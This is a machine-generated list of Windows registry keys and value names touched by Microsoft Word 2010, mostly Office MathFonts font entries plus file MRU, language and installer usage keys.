HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3427C
3427C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
